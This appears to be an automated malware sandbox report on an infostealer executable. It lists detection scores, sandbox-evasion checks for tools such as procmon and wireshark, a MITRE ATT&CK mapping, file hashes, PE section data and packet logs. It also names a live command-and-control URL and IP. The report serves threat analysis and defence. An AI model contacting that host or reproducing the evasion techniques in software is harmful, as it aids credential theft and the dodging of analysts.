Source: C:\Users\user\Desktop\lolvgcpX19.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_01169980 rdtsc 0_2_01169980
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F9C6F0 LdrInitializeThunk,0_2_00F9C6F0
Source: lolvgcpX19.exe, lolvgcpX19.exe, 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\lolvgcpX19.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.6:49710 -> 5.101.3.217:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
lolvgcpX19.exe43%VirustotalBrowse
lolvgcpX19.exe45%ReversingLabsWin32.Trojan.Generic
lolvgcpX19.exe100%AviraTR/Crypt.TPM.Gen
lolvgcpX19.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF170%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a10%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862fff::30%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868620%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=00%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
5.101.3.217
truefalse
    		high
    httpbin.org
    		3.218.7.103
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0true
      • Avira URL Cloud: safe
      		unknown
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862true
      • Avira URL Cloud: safe
      		unknown
      https://httpbin.org/ipfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmllolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpfalse
          		high
          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://html4/loose.dtdlolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1lolvgcpX19.exe, 00000000.00000003.2295074222.0000000000657000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311225236.0000000000659000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2295007979.0000000000652000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://httpbin.org/ipbeforelolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              https://curl.se/docs/http-cookies.htmllolvgcpX19.exe, lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://curl.se/docs/hsts.html#lolvgcpX19.exefalse
                  		high
                  http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862fff::3lolvgcpX19.exe, 00000000.00000003.2295074222.0000000000657000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311225236.0000000000659000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2295007979.0000000000652000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSlolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://curl.se/docs/alt-svc.htmllolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    http://.csslolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      http://.jpglolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        5.101.3.217
                        		home.fiveth5ht.topRussian Federation
                        		34665PINDC-ASRUfalse
                        3.218.7.103
                        		httpbin.orgUnited States
                        		14618AMAZON-AESUSfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1581218
                        Start date and time:2024-12-27 08:45:23 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 9s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:4
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:lolvgcpX19.exe
                        renamed because original name is a hash value
                        Original Sample Name:605f4d4c3e2be9f71fe0974b6ce3c714.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        5.101.3.217w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                        mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                        HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                        3.218.7.103w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                          E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            httpbin.org8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                            • 34.226.108.155
                            w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                            • 3.218.7.103
                            mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            jklg6EIhyR.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            qr2JeuLuOQ.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse
                            • 3.218.7.103
                            gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                            • 34.226.108.155
                            HFoyAy1tg8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • 98.85.100.80
                            home.fiveth5ht.topw6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                            • 5.101.3.217
                            mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                            • 5.101.3.217
                            HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                            • 5.101.3.217

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            PINDC-ASRUw6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                            • 5.101.3.217
                            mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                            • 5.101.3.217
                            HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                            • 5.101.3.217
                            6ufJvua5w2.exeGet hashmaliciousCryptOne, Stealc, VidarBrowse
                            • 91.215.85.11
                            Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                            • 91.215.85.142
                            3cb770h94r.elfGet hashmaliciousOkiruBrowse
                            • 45.145.172.130
                            na.elfGet hashmaliciousMiraiBrowse
                            • 5.188.210.194
                            na.elfGet hashmaliciousMirai, MoobotBrowse
                            • 5.8.21.138
                            lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                            • 80.87.206.189
                            lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                            • 80.87.206.189
                            AMAZON-AESUS8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                            • 34.226.108.155
                            w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                            • 3.218.7.103
                            db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 50.17.226.153
                            mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            jklg6EIhyR.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            qr2JeuLuOQ.exeGet hashmaliciousUnknownBrowse
                            • 34.226.108.155
                            E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse
                            • 3.218.7.103
                            xd.mips.elfGet hashmaliciousMiraiBrowse
                            • 34.206.168.77

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Entropy (8bit):7.981996150461257
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • VXD Driver (31/22) 0.00%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:lolvgcpX19.exe
                            File size:4'502'528 bytes
                            MD5:605f4d4c3e2be9f71fe0974b6ce3c714
                            SHA1:b361107308ff54acebd2221648551ea4ea60d679
                            SHA256:f455531a6a17ac4c13070b4dc22758990ec5c31dfb80f4a4f914745f66da3d2f
                            SHA512:d1181b2fa61e2c6c9b908bb5c9cd24376f286dbabc9c916527501fae981be4d7f735c6dcbd9e6bcc7dce586d0993a45fc8d84dc156bc16f5360e1b2197d57e49
                            SSDEEP:98304:rlU+ho/skYnTALFT52S0X5Uy5TOiTdoCiJjHgA82r6rQdu3fkF:rlL1kYcLv0XVRoCW866r6uPkF
                            TLSH:8126337C0F95B604CEADAC3CB6C772903C174AA2CF2DF598A96A84A3F9475D7C55E080
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@..........................@......".D...@... ............................

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0x1041000
                            Entrypoint Section:.taggant
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                            DLL Characteristics:DYNAMIC_BASE
                            Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Authenticode Signature

                            Signature Valid:
                            Signature Issuer:
                            Signature Validation Error:
                            Error Number:
                            Not Before, Not After
                              Subject Chain
                                Version:
                                Thumbprint MD5:
                                Thumbprint SHA-1:
                                Thumbprint SHA-256:
                                Serial:

                                Entrypoint Preview

                                Instruction
                                jmp 00007F7B98E8CCBAh
                                setb byte ptr [eax+eax+00h]
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add ecx, dword ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc3fabc0x10ywbalksd
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0xc3fa6c0x18ywbalksd
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x6db0000x288a00feb0757c8d5c6755639f6a3ea736ced6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x6dc0000x1ac0x200d755cb7ca107f9f9e03e78d6958a6abdFalse0.58203125data4.554761189306271IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x6de0000x3a30000x200947726a68a29291ed6d7def0e9efbdffunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                ywbalksd0xa810000x1bf0000x1bee0096a1bdac7952a595c6ebbbf0ab4a0aeaFalse0.994453125data7.955597758954747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                codissdg0xc400000x10000x40078e226e7654a9d4e0e27c8e9155c2eb0False0.734375data5.814335075900996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0xc410000x30000x2200fddb362a1a8ca17692fb8c6ca38ffc21False0.06479779411764706DOS executable (COM)0.7506224252628687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_MANIFEST0xc3facc0x152ASCII text, with CRLF line terminators0.6479289940828402

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 27, 2024 08:46:19.629542112 CET49708443192.168.2.63.218.7.103
                                Dec 27, 2024 08:46:19.629611015 CET443497083.218.7.103192.168.2.6
                                Dec 27, 2024 08:46:19.629671097 CET49708443192.168.2.63.218.7.103
                                Dec 27, 2024 08:46:19.642061949 CET49708443192.168.2.63.218.7.103
                                Dec 27, 2024 08:46:19.642085075 CET443497083.218.7.103192.168.2.6
                                Dec 27, 2024 08:46:21.505258083 CET443497083.218.7.103192.168.2.6
                                Dec 27, 2024 08:46:21.505965948 CET49708443192.168.2.63.218.7.103
                                Dec 27, 2024 08:46:21.505990028 CET443497083.218.7.103192.168.2.6
                                Dec 27, 2024 08:46:21.507479906 CET443497083.218.7.103192.168.2.6
                                Dec 27, 2024 08:46:21.507648945 CET49708443192.168.2.63.218.7.103
                                Dec 27, 2024 08:46:21.509449959 CET49708443192.168.2.63.218.7.103
                                Dec 27, 2024 08:46:21.509524107 CET443497083.218.7.103192.168.2.6
                                Dec 27, 2024 08:46:21.521394968 CET49708443192.168.2.63.218.7.103
                                Dec 27, 2024 08:46:21.521405935 CET443497083.218.7.103192.168.2.6
                                Dec 27, 2024 08:46:21.563014984 CET49708443192.168.2.63.218.7.103
                                Dec 27, 2024 08:46:21.860258102 CET443497083.218.7.103192.168.2.6
                                Dec 27, 2024 08:46:21.860385895 CET443497083.218.7.103192.168.2.6
                                Dec 27, 2024 08:46:21.860472918 CET49708443192.168.2.63.218.7.103
                                Dec 27, 2024 08:46:21.923054934 CET49708443192.168.2.63.218.7.103
                                Dec 27, 2024 08:46:21.923084021 CET443497083.218.7.103192.168.2.6
                                Dec 27, 2024 08:46:24.104717016 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.224931002 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.225142002 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.226077080 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.345707893 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.345731020 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.345796108 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.345834970 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.345848083 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.345865965 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.345895052 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.345913887 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.345922947 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.345962048 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.345978022 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.346014977 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.346029043 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.346059084 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.346081972 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.346101046 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.346129894 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.346174002 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.346189976 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.346230030 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.465383053 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.465394020 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.465462923 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.465464115 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.465509892 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.465527058 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.465557098 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.465594053 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.465648890 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.465743065 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.465789080 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.509269953 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.509391069 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.628973961 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.629084110 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.673249960 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.673327923 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:24.789285898 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.877300978 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:24.877404928 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.117320061 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.117424011 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.236860037 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.237198114 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.237289906 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.238261938 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.238318920 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.356828928 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.356849909 CET80497105.101.3.217192.168.2.6
